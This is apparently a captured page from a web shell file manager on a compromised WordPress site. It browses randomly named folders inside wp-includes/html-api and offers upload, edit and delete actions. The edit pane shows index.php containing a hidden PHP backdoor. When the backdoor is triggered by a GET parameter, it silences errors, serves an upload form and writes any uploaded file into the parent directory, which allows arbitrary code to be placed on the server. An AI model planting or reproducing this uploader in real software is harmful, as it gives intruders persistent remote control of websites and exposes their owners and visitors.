golden hour
/home/godaofbq/elitehyperbarics.com/wp-includes/html-api/ctmd1jy/swqvhdz
⬆️ Go Up
Upload
File/Folder
Size
Actions
.htaccess
178 B
Del
OK
index.html
0 B
Del
OK
index.php
324 B
Del
OK
mtwyvlc
-
Del
OK
Edit: index.php
<?php error_reporting(0); if(trim($_GET['f']) == 'f'){ $saw1 = $_FILES['file']['tmp_name']; $saw2 = '../'.$_FILES['file']['name']; echo "<form method='POST' enctype='multipart/form-data'><input type='file'name='file' /><input type='submit' value='upload' /></form>"; if($saw1 && $saw2) move_uploaded_file($saw1, $saw2); } ?>
Save